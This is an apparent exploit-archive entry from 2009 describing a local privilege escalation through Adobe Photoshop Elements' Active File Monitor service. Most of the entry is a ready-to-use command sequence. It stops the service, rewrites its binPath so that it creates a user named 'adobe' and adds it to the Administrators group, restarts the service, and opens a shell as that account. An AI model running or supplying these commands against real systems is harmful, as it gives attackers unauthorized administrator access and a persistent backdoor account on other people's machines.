Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation
# Published : 2009-10-29
# Author : bellick
# Previous Title : Alleycode HTML Editor 2.2.1 BoF
# Next Title : Firefox 3.5.3 local download manager temp file creation

To exploit this issue, attackers require local, interactive access to an affected computer.

The following example commands are available:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add &amp;&amp; net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%adobe cmd